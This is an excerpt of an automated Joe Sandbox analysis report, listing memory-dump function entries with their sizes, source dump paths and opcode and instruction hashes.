                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e872b30ceb328c6d517650b040b8820fd9e0739923da3599c33da2c52fa151e3
                                                                                                                                                                                                      • Instruction ID: 1e989a0f7836ceef7c139dc53ca507803ce78cd0ce0327952d2e40d3e9f981ec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e872b30ceb328c6d517650b040b8820fd9e0739923da3599c33da2c52fa151e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF41F070A1CE064FE759EF3CD4556A6B3D1FF94300F14467ED48AC3299DE29B8828780
                                                                                                                                                                                                      Function 00007FFB498C8270 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 78aa00449b95ba628de143f3adf7c5754fdfffc740bf989283ab2881e8cca37a
                                                                                                                                                                                                      • Instruction ID: 3125cd98893198deb03491972e0d3a6d0cc3dd67164a123757e3121dc0f9d051
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78aa00449b95ba628de143f3adf7c5754fdfffc740bf989283ab2881e8cca37a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2641DE6260CA4A4FE359EE3CE94577577D1EF9A380B5805BEE469CB2D6CC28AC818350
                                                                                                                                                                                                      Function 00007FFB498CD228 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e49c0d8825f132b54f1617cdc594432c04136c548d1e66ddcf5dffa497ae7500
                                                                                                                                                                                                      • Instruction ID: f167ea24a5f9f345132d618d380716bbd3a33613c4d6fe6cdb80c2b70c2fc8e5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e49c0d8825f132b54f1617cdc594432c04136c548d1e66ddcf5dffa497ae7500
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40414942B0C69A1BE741BF7CE8A51F93BA1EF9232570840B7D4DCCB183DC08A84A83D5
                                                                                                                                                                                                      Function 00007FFB498D4C50 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 998ab40dee5e9044aa3873fa633e3f02d77dcb4ffd2683a2ae5af6ac707b9c56
                                                                                                                                                                                                      • Instruction ID: c6a1c9190e8b102a9f5f9d63bc7e2ab4b696a1a4bfa4de264ef87a8ce9d8fa6d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 998ab40dee5e9044aa3873fa633e3f02d77dcb4ffd2683a2ae5af6ac707b9c56
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85312B6160DBCA0FD756DB3C98646743FE0EF43660B0A42EBD489CB1E3D9189C09C392
                                                                                                                                                                                                      Function 00007FFB498DFBEA Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: f9b47218c6c7b8e2b9065c75c9c171a15f8e407e3cbadd852764073b1db1b2b1
                                                                                                                                                                                                      • Instruction ID: 626de00409aa685d6d8532eabf22e9f29ee4f5d63a907fd1c0baf7cc57f6eb6f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9b47218c6c7b8e2b9065c75c9c171a15f8e407e3cbadd852764073b1db1b2b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E831047161CF4E4FDB48EF2CD8445667BE1EFA9750B1001AEE88DC3292DE21E842C781
                                                                                                                                                                                                      Function 00007FFB498C48ED Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4dd6f2da16b7c5f7bbd076df21e24c654568912dd1f93e4bb9f07924acfd203d
                                                                                                                                                                                                      • Instruction ID: 7c6a42e2a1ab09783dd5e5c38011fc1c911754b08493114b3c09868bb643300d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd6f2da16b7c5f7bbd076df21e24c654568912dd1f93e4bb9f07924acfd203d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD319EB061CA1A8BD768BF2CC184AB973E2EF98745F60467DD05FC3295CE25B8428790
                                                                                                                                                                                                      Function 00007FFB498DF271 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c95adf402eefedfeb99f24775c7ebc09ec8d7e2be0a0ebd1d480bad4f972908b
                                                                                                                                                                                                      • Instruction ID: 14711b75b5b1f7fef6d86163408b87287f124f2f8fd333d62067321ca1951df5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c95adf402eefedfeb99f24775c7ebc09ec8d7e2be0a0ebd1d480bad4f972908b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C931D171A1C98B4FE74AEF3CC0507A9B7E1EF95384F0841BAD059C7293CE28A84597A1
                                                                                                                                                                                                      Function 00007FFB498DF3B5 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 583c9b49b40c3d261c75008a9571b934d10047801f0950afaaf490032802c0cf
                                                                                                                                                                                                      • Instruction ID: 223158f51e5505f2c177979639cecd6315b45926135f39d467008d217613de8b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 583c9b49b40c3d261c75008a9571b934d10047801f0950afaaf490032802c0cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3310871A4DA8A4FD745EF3CD8526A87BE1EF4A344B0901FBD408DB193CD386C8587A1
                                                                                                                                                                                                      Function 00007FFB498C49F2 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 736bb65bb355a797824067a755e72018c5ee871da43c5d2229ef28b14e626824
                                                                                                                                                                                                      • Instruction ID: e93717d83501bbef6c03d94aaa748d1facb22ef541157cb5ba01d5d1ed14084e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 736bb65bb355a797824067a755e72018c5ee871da43c5d2229ef28b14e626824
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4731AD71A0DA594FDB95EF3C9899BE87BE1EB59351F0800B6E40DC72EACE249C458381
                                                                                                                                                                                                      Function 00007FFB498DCA31 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 729d429a7fd72ada29ee8f972f70df3164fc8460604fe2721e68678d54236f8b
                                                                                                                                                                                                      • Instruction ID: 5789379aa8c0c9fa24730cb2930055a12503c9dc6038edddf9802f1fc16934a9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 729d429a7fd72ada29ee8f972f70df3164fc8460604fe2721e68678d54236f8b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9731E47180CB884FEB14EF28DC069E9BBE4EF96710F04026FE489D3151D665A94487C3
                                                                                                                                                                                                      Function 00007FFB498D9B6B Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 1757d66ea4c8b66830f1e68c0232dff8eb922a9f2ecc1d107d0db6add46411c5
                                                                                                                                                                                                      • Instruction ID: bc221208fc423aa3568ec9789ef6086b03cd3ae8bd1f9e2fa9a481a80f1c1494
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1757d66ea4c8b66830f1e68c0232dff8eb922a9f2ecc1d107d0db6add46411c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F31067090994A9FDB94EF2CC589AA877E1FF59754F0102B9E40DD72A1CA39E880CB50
                                                                                                                                                                                                      Function 00007FFB498CBE1D Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 62e651813aa2ab7d746f04f12d30f7d5716e4fef00aad56271d9b8012a2baae4
                                                                                                                                                                                                      • Instruction ID: 0aab1f176a80ed936e63e5627a3c746f2972f3346bc861439268dd3fc254bc4e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62e651813aa2ab7d746f04f12d30f7d5716e4fef00aad56271d9b8012a2baae4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711B77260DE4A0FE798DE2CD856A717BD5EF9625070401BAE44CC71D3DD29E841C350
                                                                                                                                                                                                      Function 00007FFB498CA2CB Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 509b489ceb7ef001a38d4a43b04f4992c52b4930945586c4fbed36b759ec241e
                                                                                                                                                                                                      • Instruction ID: 0c655bc02bc16a767fe9baab9120ef65a8630a58aa171dfa3bb658f9b39787f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 509b489ceb7ef001a38d4a43b04f4992c52b4930945586c4fbed36b759ec241e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B213DB0E19A5A8FEBA9EF3CCC457A873A1EF44341F1001FDE05DD2191CE399A818B14
                                                                                                                                                                                                      Function 00007FFB498C0480 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6d8d9f81d0e4f9e9793b830989f03cfbb373fd4391ba1d9038cf223277ad535e
                                                                                                                                                                                                      • Instruction ID: d8e24bf24e8f3469812e8fdb22195103d41b9a312868e62e744e377f63e60024
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8d9f81d0e4f9e9793b830989f03cfbb373fd4391ba1d9038cf223277ad535e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE012842B0E06A05EA127A7CF1915FD3F41DF4523EB0D42B7E4DC898D3DC89A84D41D9
                                                                                                                                                                                                      Function 00007FFB498CF161 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0de0551d2718c6ac1e34aa0d85b669224b15f4421b430ddc98331dcd78070fc4
                                                                                                                                                                                                      • Instruction ID: c8190ffe1933237a9b67276c56d6b2a32cfdb3eca08af21e3c7c2d6f0376fc6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0de0551d2718c6ac1e34aa0d85b669224b15f4421b430ddc98331dcd78070fc4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0901F9A270EA470FF69B663CF8162B96BC0CB9627131551BBD48EC71D3DC099C830295
                                                                                                                                                                                                      Function 00007FFB498C92C5 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 03d0e172cf46242a1169b36acfbf7a4e4f85d5298b4cf23ed111e8eefca3222d
                                                                                                                                                                                                      • Instruction ID: 0605ee795e04682ccd2cc64562015c962896e69575fb95c836bb653b4533eecf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03d0e172cf46242a1169b36acfbf7a4e4f85d5298b4cf23ed111e8eefca3222d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D301DEB151C6464FEBA4EF2DC5457A47BD0FF09300F4801FAD098CB1D2CA1A9C458781
                                                                                                                                                                                                      Function 00007FFB498DABB1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 7abf957a2278454c58faf7652ef6dc24f3b1954ed3da12464714ee41d4db72a8
                                                                                                                                                                                                      • Instruction ID: 7dbf50a6a6b05d8054de5e14b492ff72b86640b856eb4d2bfe9965ea52332c4e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7abf957a2278454c58faf7652ef6dc24f3b1954ed3da12464714ee41d4db72a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0C8C2A0EA8B1FE3966A7C99962B46B85DB9916171841B7D04CC62D3DC484C8743E2
                                                                                                                                                                                                      Function 00007FFB498C5A80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ea580088ee37cee6efe4cc6de1103e009682504e9b30a6ba4e38f9f941bf8556
                                                                                                                                                                                                      • Instruction ID: 7162dc0e534d0861259ac25f40d814c3f4ef6238bcf904b86204e3c00c37c237
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea580088ee37cee6efe4cc6de1103e009682504e9b30a6ba4e38f9f941bf8556
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C301A261A2DA0B4FDA9DFE3CD09096A73E1FFA8340744057AD459C3685DD24E8428381
                                                                                                                                                                                                      Function 00007FFB498C4B4D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a0ac36e12542ab6fea39ff5be1669e3d39b9e30394b70c5c136a6c63f6d5cb54
                                                                                                                                                                                                      • Instruction ID: 81a037df7de420486d9adbf3cf72c6c98dee485fc03b9d102826ded5f334c78c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ac36e12542ab6fea39ff5be1669e3d39b9e30394b70c5c136a6c63f6d5cb54
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001818581EAC71FD3636BBC69202A16FA48F8316571D01E7E0E8CB0CBD90C5895C3A6
                                                                                                                                                                                                      Function 00007FFB498C5BE9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a8925249790f00633499a79c2ae2c1364307829677f87eedc7fe6189e90bdee5
                                                                                                                                                                                                      • Instruction ID: 100cc86aa5109bb056d4976b7680096aff4017d0826b3237555c3972357fea71
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8925249790f00633499a79c2ae2c1364307829677f87eedc7fe6189e90bdee5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801ADB091D78E4FDB46EF3888180A97FB0FF15200B4004ABD869C71A2DA7588148740
                                                                                                                                                                                                      Function 00007FFB498D6413 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b38305b3b40af3cfe382425060cd21d954bd3f4fff5c49e09cf031b3acd0b252
                                                                                                                                                                                                      • Instruction ID: ab816605b50421064d3c2b8a53dd92c460153bffd055e0cdb23eda9940f2a47d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b38305b3b40af3cfe382425060cd21d954bd3f4fff5c49e09cf031b3acd0b252
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF0FE71A2CB488B9F14AE4CBC434AD77D0FB89B60F10116FF94943241D621B8928AC7
                                                                                                                                                                                                      Function 00007FFB498CB902 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ab47cef7efe8d2d52ddc420f1629cf329d0d3169a77c8296238cb22c357872e5
                                                                                                                                                                                                      • Instruction ID: 1cc2f89cd7891eecb1487562a44157e20c0498e43f7da5f7c52ba88e6098fb6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab47cef7efe8d2d52ddc420f1629cf329d0d3169a77c8296238cb22c357872e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F0C86050DACB0FD316AF3CD5545A0BBE0AF46350B4D01F6D448CB2D3D91DA899C351
                                                                                                                                                                                                      Function 00007FFB498C8AE8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 473756d5ae6d97b0ab0921bf3aea01914f29052d31a171fe2b784d00b88879ae
                                                                                                                                                                                                      • Instruction ID: a7f8de55f22cce541dc3c022686699f76c06a935c66b0810f306cd5d02b3693f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 473756d5ae6d97b0ab0921bf3aea01914f29052d31a171fe2b784d00b88879ae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0A0A2A1CD1E0AE6A8BE3CA4456BE23E1EBD4291F40057AE45ED36C5DD69A84343C1
                                                                                                                                                                                                      Function 00007FFB498C51FE Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ee2a6d1ee193be2113fd58d9891f49b8590f506b99d07875d645aacde1cb6878
                                                                                                                                                                                                      • Instruction ID: b59842a01fb6da6e5e928cb6e9b848f1abb5103ab9a3c7b27a8e1d3faa1ea275
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2a6d1ee193be2113fd58d9891f49b8590f506b99d07875d645aacde1cb6878
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4F0E99271DD870BD749AE3CA8815FDB7C1EF6025070404BDC059C75A6DD25E98A8780
                                                                                                                                                                                                      Function 00007FFB498D5381 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c22214349aba8a2af8fac0b57b92db312700bc1ce3a8325770904d24a18c2f4d
                                                                                                                                                                                                      • Instruction ID: 0c4e10a0edb41a8ee37d84cb0ab463f7546ffb46cb8d530aae18e1f41cd975bb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c22214349aba8a2af8fac0b57b92db312700bc1ce3a8325770904d24a18c2f4d
